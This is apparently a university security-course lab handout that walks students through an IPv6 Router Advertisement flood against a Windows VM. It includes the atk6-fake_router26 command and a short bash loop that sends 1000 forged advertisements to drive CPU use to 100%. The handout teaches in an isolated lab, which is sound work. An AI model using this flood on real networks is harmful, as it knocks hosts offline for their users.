CNIT 123 Project 7: Windows DoS with IPv6 Router Advertisement Packets (10 pts.)

What you Need

Protecting a Windows Host

If you are using a Windows host machine running VMware, your host will suffer from this attack.

To protect the host machine, open an Administrator Command Prompt and execute this command:

netsh interface ipv6 set interface "Ethernet" routerdiscovery=disabled
However, do NOT execute that command on the Windows 2008 Server virtual machine you are attacking before starting this project.

Use NAT Networking

Set both virtual machines to use NAT networking. That protects the other machines in the room from this attack.

Start the Windows Machine

Start the Windows machine and log in.

Open a Command Prompt and execute the IPCONFIG commmand. You should see an IPv6 address starting with fe80::, as shown below on this page:

Sending a Single Router Advertisemnt Packet

On your Kali Linux machine, in a Terminal window, execute this command:
atk6-fake_router26 -A 1::/64 -n 1 eth0
This sends a single Router Advertisement to every machine on your LAN. All modern operating systems will join that network in a process called SLAAC (Stateless Address Autoconfiguration).

Observing the SLAAC Address

On the Windows machine, in a Command Prompt, execute the IPCONFIG commmand.

You should see an IPv6 address starting with 1:, as shown below on this page:

Open Task Manager

Click on your Windows desktop to make it active. Then press Ctrl+Shift+Esc.

Task Manager opens. Click the Performance tab to show the CPU usage. The usage should be near 0%, as shown below.

Making a Simple Flood Tool

On your Kali Linux machine, in a Terminal window, execute this command:
nano flood
In the nano window, type or paste in this script, which sends 1000 Router Advertisement packets.
#!/bin/bash
for i in {1..1000}
do
atk6-fake_router26 -A 1:$i::/64 -n 1 eth0
done
Type Ctrl+X, Y, Enter to save your script.

On your Kali Linux machine, in the Terminal window, execute these commands:

chmod a+x flood

./flood

Observing CPU Usage on the Windows Machine

Look at the Windows desktop. The CPU usage should be 100%, as shown below.

Observing the SLAAC Addresses on the Windows Machine

On the Windows machine, in a Command Prompt, execute the IPCONFIG commmand.

You should see many IPv6 address starting with 1:, as shown below on this page:

Saving the Image

Save a screen image showing many IPv6 addresses. Give it a filename of Proj 7 from YOUR NAME.

Turning In Your Project

Email the image to cnit.123@gmail.com with a subject line of Proj 7 from YOUR NAME.


Last modified 9-24-15